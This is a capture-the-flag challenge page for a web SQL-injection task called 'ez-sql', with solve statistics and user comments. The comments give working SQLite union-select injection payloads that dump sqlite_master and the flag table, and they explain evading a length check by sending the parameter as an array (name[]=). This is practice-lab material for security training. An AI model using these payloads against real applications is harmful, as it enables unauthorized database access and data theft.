ez-sqlWEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: xht0525
一血奖励: 0金币
解  决: 26
提  示:
描  述:

just your average sql challenge, nothing else to see here (trust)

其  他: 下载
评论
不要不要 8月前

bp抓包,URL编码。 name[]=-534249' union select name,sql from sqlite_master--+ 得到表名和建表语句,知道表的字段flag name[]=-534249' union select flag,flag from flag_01ffe035_7ddb_4c79_9a09_8a0b2e6a2705--+

回复 0

justsosoloveyou 1年前

关键是用name[]=,绕过name.length的长度限制。如:/?name[]=1&name[]=2能够将两个值作为同参数名的数组提交给服务器,但是name=[1,2],name.length=2。

回复 0

xht0525 1年前

name[]=changzifuchuan' union select name,name from sqlite_master--

回复 1

WriteUp

image
ChinaIT

0 金币

评分(1)

解题动态

么啊吗吗吗吗 攻破了该题 11天前
91porn 攻破了该题 1月前
bugbiubiubiu 攻破了该题 1月前
a1104048658 攻破了该题 2月前
LancyMorry 攻破了该题 3月前
guojiachangsheng 攻破了该题 3月前
bugkuctf6 攻破了该题 3月前
2321331170 攻破了该题 3月前
t1tl3d 攻破了该题 4月前
nabs 攻破了该题 4月前
wangjf 攻破了该题 4月前
Garmin 攻破了该题 4月前
18092952956 攻破了该题 5月前
BrankYeen 攻破了该题 7月前
xiaoxiao972521 攻破了该题 7月前
discu00 攻破了该题 8月前
BusyMsJs 攻破了该题 8月前
不要不要 攻破了该题 8月前
fcfc 攻破了该题 8月前
曦羽unT0x1ns 攻破了该题 9月前
问题反馈